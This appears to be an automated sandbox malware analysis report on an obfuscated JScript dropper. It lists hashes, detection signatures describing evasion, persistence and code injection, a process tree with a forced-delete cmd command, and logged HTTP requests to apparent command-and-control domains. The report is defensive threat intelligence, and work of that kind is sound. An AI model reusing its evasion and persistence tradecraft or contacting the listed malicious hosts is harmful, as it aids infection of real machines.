Play interactive tour

Edit tour

Analysis Report xPUqa4qbDL

Overview

General Information

Sample Name:	xPUqa4qbDL (renamed file extension from none to js)
Analysis ID:	365904
MD5:	e43e6029bb62780558539d8f052d3eaa
SHA1:	41aa8edac913960793f6cdf0a27f0a64b8260e6f
SHA256:	d9cc91ff8d5472ce7224c773927e03cf44a11b5f452e6c65fa9899068ed1f6b7
Infos:
Most interesting Screenshot:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Renames wscript.exe to bypass HIPS

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the product ID of Windows

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

wscript.exe (PID: 6336 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6432 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 6560 cmdline: 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ibfmvoj.exe (PID: 6652 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

ibfmvoj.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

ibfmvoj.exe (PID: 6860 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

ibfmvoj.exe (PID: 7128 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

ibfmvoj.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmp	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x6a6a:$s12: WScript.Shell

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: 101legit.com	Virustotal: Detection: 6%	Perma Link
Source: ww7.101legit.com	Virustotal: Detection: 6%	Perma Link
Source: http://101legit.com/	Virustotal: Detection: 6%	Perma Link
Source: http://101legit.com/0.html	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: xPUqa4qbDL.js

Virustotal: Detection: 35%

Perma Link

Source:	Binary string: scrrun.pdb source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source:	Binary string: wshom.pdb source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0B9D4A0 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,

7_2_00007FF7C0B9D4A0

Source: Joe Sandbox View	IP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox View	IP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox View	IP Address: 199.59.242.153 199.59.242.153

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: global traffic	HTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: legitville.com
Source: global traffic	HTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: 101legit.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: ww7.101legit.com

Source: global traffic	HTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: legitville.com
Source: global traffic	HTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: 101legit.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: ww7.101legit.com

Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/85288795/coreui.statics/images/social/facebook.png" alt="Facebook"> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/93690392/coreui.statics/images/social/twitter.png" alt="Twitter"> equals www.twitter.com (Twitter)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/b23f9ba2/coreui.statics/images/social/linkedin.png" alt="LinkedIn"> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/c79952ca/coreui.statics/images/social/youtube.png" alt="Youtube"> equals www.youtube.com (Youtube)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/2532198d/coreui.statics/images/social/facebook.svg"> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/2d505657/coreui.statics/images/social/youtube.svg"> equals www.youtube.com (Youtube)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/413bd4a8/coreui.statics/images/social/linkedin.svg"> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/6f40299c/coreui.statics/images/social/twitter.svg"> equals www.twitter.com (Twitter)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <a data-m='{"id":"n1m1r6a2","sN":1,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.facebook.com/microsoftschweiz" title="Microsoft auf Facebook folgen (öffnet in einem neuen Tab)." target="_blank"> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <a data-m='{"id":"n3m1r6a2","sN":3,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.linkedin.com/company/1035" title="Microsoft auf LinkedIn folgen (öffnet in einem neuen Tab)." target="_blank"> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: <a data-m='{"id":"n4m1r6a2","sN":4,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.youtube.com/user/MicrosoftCH" title="Microsoft auf YouTube folgen (öffnet in einem neuen Tab)." target="_blank"> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: legitville.com

Source: wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmp	String found in binary or memory: http://101legit.com/
Source: wscript.exe, 00000002.00000003.203396181.000002156F014000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmp	String found in binary or memory: http://101legit.com/0.html
Source: wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmp	String found in binary or memory: http://101legit.com/0.html1
Source: wscript.exe, 00000002.00000003.202889828.000002156F338000.00000004.00000001.sdmp	String found in binary or memory: http://101legit.com/0.htmle843
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: http://github.com/aFarkas/lazysizes
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: http://github.com/requirejs/domReady
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: http://github.com/requirejs/requirejs/LICENSE
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2dCNN
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2dKBu
Source: wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmp	String found in binary or memory: http://legitville.com/
Source: wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmp	String found in binary or memory: http://legitville.com/0.html
Source: wscript.exe, 00000002.00000003.339266046.000002156F320000.00000004.00000001.sdmp	String found in binary or memory: http://legitville.com/0.htmlll
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: wscript.exe, 00000002.00000003.210219910.000002156F351000.00000004.00000001.sdmp	String found in binary or memory: http://requirejs.org/docs/errors.html#
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/Organization
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	String found in binary or memory: http://ww7.101legit.com
Source: wscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmp	String found in binary or memory: http://ww7.101legit.com/
Source: wscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmp	String found in binary or memory: http://ww7.101legit.com/ll
Source: wscript.exe, 00000000.00000003.188728848.000001F46835C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189473003.000002156F12D000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196514570.000001F7A3F6D000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197733159.000001D32E6AD000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236226752.0000025BBDB4D000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254663132.000001DBCE51D000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: ibfmvoj.exe, 0000000A.00000003.221366463.000001F1F81FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/0
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp	String found in binary or memory: https://assets.onestore.ms
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	String found in binary or memory: https://azure.micro
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://channel9.msdn.com/
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3NYMe?ver=7b0e&q=
Source: wscript.exe, 00000002.00000003.210157018.000002156D1D6000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4D5uF?ver=204a&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DRie?ver=f61d&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DfTp?ver=8993&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4E4rT?ver=2072&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4H9G0?ver=5bb0&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4HCqV?ver=5c59&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Mznr?ver=36b6&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pkvE?ver=d8fc&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pndL?ver=5217&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pxBu?ver=eae5&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4rriw?ver=b2d5&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4rzE2?ver=aa0b&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sO6R?ver=7d62&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQDc?ver=30c2&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u7Rm?ver=6f53&q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4vykv?ver=6019&q=
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.210173138.000002156F279000.00000004.00000001.sdmp	String found in binary or memory: https://mem.gfx.ms
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202797295.000002156F850000.00000004.00000001.sdmp	String found in binary or memory: https://microsoftwindows.112.2o7.net
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/about/de-ch/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.live.com/owa/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://products.office.com/de-ch/academic/compare-office-365-education-plans
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	String found in binary or memory: https://products.office~
Source: wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	String found in binary or memory: https://publisher.liveperson.net
Source: wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	String found in binary or memory: https://publisher.liveperson.net/iframe-le-tag/iframe.html?lpsite=60270350&lpsection=store-sales
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://schema.org/ItemList
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	String found in binary or memory: https://swiftkey.com/images/misc/stores/app/en.png
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/microsoft_ch
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://ussearchprod.trafficmanager.net/services/api/v1.0/store/categories
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/microsoftch/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.linkedin.com/company/1035
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.onenote.com/?omkt=de-CH
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.skype.com/de/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.xbox.com/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/MicrosoftCH

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B9AE00 GetWindowLongPtrA,SetWindowLongPtrA,NtdllDefWindowProc_A,		7_2_00007FF7C0B9AE00
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B9AC78 KillTimer,GetLastError,KillTimer,GetLastError,SetTimer,GetLastError,NtdllDefWindowProc_A,KillTimer,EnumThreadWindows,PostQuitMessage,		7_2_00007FF7C0B9AC78

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA21C4	7_2_00007FF7C0BA21C4
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B9AE8C	7_2_00007FF7C0B9AE8C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA1A34	7_2_00007FF7C0BA1A34
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B98348	7_2_00007FF7C0B98348
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA14A0	7_2_00007FF7C0BA14A0
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B991AC	7_2_00007FF7C0B991AC
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B96954	7_2_00007FF7C0B96954
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA0A94	7_2_00007FF7C0BA0A94
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B95A34	7_2_00007FF7C0B95A34
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA340C	7_2_00007FF7C0BA340C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA1F68	7_2_00007FF7C0BA1F68
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B97B1C	7_2_00007FF7C0B97B1C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B934D8	7_2_00007FF7C0B934D8
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0BA1C9C	7_2_00007FF7C0BA1C9C
